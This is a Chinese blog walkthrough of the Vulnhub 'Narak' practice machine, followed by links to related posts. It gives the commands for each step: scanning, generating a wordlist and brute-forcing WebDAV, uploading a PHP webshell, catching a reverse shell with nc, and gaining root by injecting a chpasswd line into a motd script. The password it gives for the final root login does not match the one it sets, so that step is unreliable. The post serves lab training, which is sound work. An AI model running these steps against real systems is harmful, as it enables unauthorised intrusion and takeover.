narak 靶机实验实战演练

已于 2022-08-03 11:52:07 修改
阅读量1.1k 收藏 5
点赞数 1
分类专栏: 学习 文章标签: 安全
于 2022-08-02 16:47:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianliandad/article/details/126125669
版权

靶机:NARAK

kali : 192.168.71.128

靶机 :192.168.71.129

渗透流程:

  1. 探测靶机ip地址

命令:fping -aqg 192.168.71.0/24

2. nmap进行靶机端口服务扫描

命令:nmap -sC -sV 192.168.71.129 -n -vv -min-rate=2000

3.进行web页面登录

通过查看网页源码,可见没有什么可以利用的

目录扫描

使用kali中的dirb工具进行目录扫描:

命令: dirb http://192.168.71.129

通过扫描后,查看发现了有一个webdav目录。

192.168.71.129/webdav

然后去访问这个目录试试,发现需要用户名密码登录。

这时,我们使用kali 下的cewl 字典生成工具 爬取该页面存在的密码,生成一个password.txt 文件。

命令:cewl 192.168.71.129 -w password.txt

密码本爆破

账号: yamdoot

密码: Swarg

上传webshell.php

命令:put webshell.php

上传成功之后,需要访问192.168.71.129建立反向连接,访问网站之前开启监听,监听命方法如下:nc -lvvp 4444

重新去访问:192.168.71.129/webdav ,点击刚刚上传的 webshell.php

看到如下情况说明成功回弹webshell

通过python进行交互:

python3 -c  ‘import pty;pty.spawn(“/bin/bash”)’

注:这里的引号都是需要英文状态下输入

可以看到home下有三个用户:inferno narakyamdoot

发现了/mnt 目录下 的 hell.sh 文件

通过 登录 BF 在线解码  

网址:https://www.splitbrain.org/services/ook

通过点击 Brainfuck to Text 进行解码得到 chitragupt

依次使用home家目录下的用户名,以及BF解码后的密码进行提权;

用户名:inferno

密码为:chitragupt

当尝试到切换到 用户名为 inferno  进行su 提权 时可以成功登录

ls 发现user.txt文件

cat查看txt文件,得到Flag;

5. 提权:

修改00-header

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

退出重新登录,su root刚刚更改的密码:

su - root

password:justice

燕返故人归来
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透测试:narak
x_13579的博客
07-03 440
hydra爆破,cewl爬取
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
红队打靶:Narak打靶思路详解(vulnhub)
Bossfrank的博客
09-02 998
本文是vulnhub靶机Narak的详细打靶过程,涉及到的知识点包括tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权等。知识点很密,需要实操打靶才会有深刻理解。。
网络安全最新靶机渗透之narak(1),跳槽字节跳动
最新发布
2401_84558314的博客
05-15 341
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
narak靶场实战详解
Askshhbs的博客
04-22 1962
网络安全,web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 靶机:https://download.vulnhub.com/ha/narak.ova 注释:使用vmwarworkstation运行虚拟机 难度:中+ 目标:取得root权限+2Flag 网络配置:这里简单介绍下我的网络配置,靶机和Kali都用的VMware,然后使用nat连接,开启了dhcp。 0x00 环境配置 虚拟网络编辑器: Kali: 靶机
Vulnhub-HA-NARAK靶机测试
qq_46015509的博客
04-24 2535
Vulnhub-HA-NARAK 靶机渗透
narak靶机总结
weixin_51692662的博客
11-06 644
webdav、narak靶机、motd提权
VulnHub靶机 narak
weixin_45208900的博客
08-28 277
链接:https://pan.baidu.com/s/1eWeX7HQ8bpNRXii5v_-39g 提取码:u1al –来自百度网盘超级会员V4的分享 arp-scan -l 探测存活主机 多出来的是192.168.37.164 就是我们的目标靶机 nmap探测一下 nmap -Pn -sV -n -A 192.168.37.164 -sV (版本探测) 打开版本探测。 -Pn和-P0都是跳过ping的步骤 -n (不用域名解析) 告诉Nmap 永不对它发现的活动IP地址进行反向域名解析 既然D
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
靶机9:NARAK
wj33333的博客
10-31 103
注:改靶机是一个固定IP:需要配置网络固定IP:192.168.26.0。
narak靶机打靶过程及思路
qq_52610024的博客
05-19 271
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 824
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
Narak靶机渗透
weixin_56306210的博客
01-31 453
Narak靶机渗透
[VulnHub靶机渗透] HA: Narak
人若无名,便可专心练剑
02-22 1492
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
Vulnhub:narak靶机练习教程
m0_74887243的博客
05-13 164
使用dirb扫描网页目录,发现了webdav的路径,访问需要用户名和密码。目标:找到两个flag:user.txt root.txt。靶机22端口开启ssh服务;80端口开启http服务。使用kali自带的字典生成工具,从网页上爬取信息。访问靶机ip查看网页源代码,没有太大帮助。将webshell上传到webdav。使用ssh的登陆inferno。攻击机和靶机都使用net模式。使用nmap扫描到靶机ip。找到上传路径,上传成功。
靶场练习第三天~vulnhub靶场之narak
qq_57976347的博客
01-28 947
靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址,寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描,dirb目录扫描工具(kali自带的),使用命令dirb http://192.168.101.102,扫描后发现有3个网址,发现有webdav网址 二、利用webdav客户端,思路:cadav..
靶机渗透之narak
weixin_64267091的博客
02-04 1084
在这次靶机渗透过程中,走到漏洞分析阶段路就断了,发现在信息收集部分可能遗漏掉一些重要信息,最后又重点扫描了一些常见的UDP端口,最后扫出来了一个69端口。然后就利用这个服务找到了一个用户名及其密码,成功访问webdav。然后使用davtest测试webdav可以上传和执行哪些文件,发现可以上传并执行php,利用cadaver客户端上传反弹shell的php文件并访问shell.php,然后通过寻找敏感文件初步提权,找到brainfuck代码,用beef工具解码,发现了用户名inferno的ssh密码。
narak靶机
qq_44640313的博客
10-15 241
UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值